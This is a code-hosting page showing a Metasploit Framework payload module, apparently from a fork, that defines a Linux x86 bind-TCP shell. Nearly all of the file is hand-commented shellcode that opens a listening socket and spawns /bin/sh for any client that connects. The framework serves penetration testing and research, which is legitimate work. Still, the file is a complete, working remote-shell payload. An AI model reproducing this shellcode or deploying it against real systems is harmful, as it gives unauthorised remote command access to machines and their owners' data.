dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/modules/payloads/singles/linux/x86/shell_bind_tcp.rb

85 lines
4.6 KiB
Ruby
Raw Permalink Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 78
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 21, 'n' ],
},
# TODO: Payload source needs serious cleanup. This payload was
# originally generated from
# external/source/unixasm/lin-x86-bndsockcode.s which supposedly
# worked when it was initially committed. Nevertheless, it was
# calling bind(2) with insane parameters, which ended up erroring out
# and causing execution to fall off the end of the shellcode,
# bursting into flames. See #7216, #7224
'Payload' =>
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\x53" + # pushl %ebx #
"\x43" + # incl %ebx #
"\x53" + # pushl %ebx #
"\x6a\x02" + # pushl $0x02 #
"\x89\xe1" + # movl %esp,%ecx #
"\xb0\x66" + # movb $0x66,%al #
"\xcd\x80" + # int $0x80 #
"\x5b" + # popl %ebx #
"\x5e" + # popl %esi #
"\x52" + # pushl %edx #
"\x68\x02\x00\x04\xd2" + # pushl $0xd2040200 #
"\x6a\x10" + # pushl $0x10 #
"\x51" + # pushl %ecx #
"\x50" + # pushl %eax #
"\x89\xe1" + # movl %esp,%ecx #
"\x6a\x66" + # pushl $0x66 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x89\x41\x04" + # movl %eax,0x04(%ecx) #
"\xb3\x04" + # movb $0x04,%bl #
"\xb0\x66" + # movb $0x66,%al #
"\xcd\x80" + # int $0x80 #
"\x43" + # incl %ebx #
"\xb0\x66" + # movb $0x66,%al #
"\xcd\x80" + # int $0x80 #
"\x93" + # xchgl %eax,%ebx #
"\x59" + # popl %ecx #
"\x6a\x3f" + # pushl $0x3f #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x49" + # decl %ecx #
"\x79\xf8" + # jns <bndsockcode+50> #
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
"\x89\xe3" + # movl %esp,%ebx #
"\x50" + # pushl %eax #
"\x53" + # pushl %ebx #
"\x89\xe1" + # movl %esp,%ecx #
"\xb0\x0b" + # movb $0x0b,%al #
"\xcd\x80" # int $0x80 #
}
))
end
end
Reference in New Issue View Git Blame Copy Permalink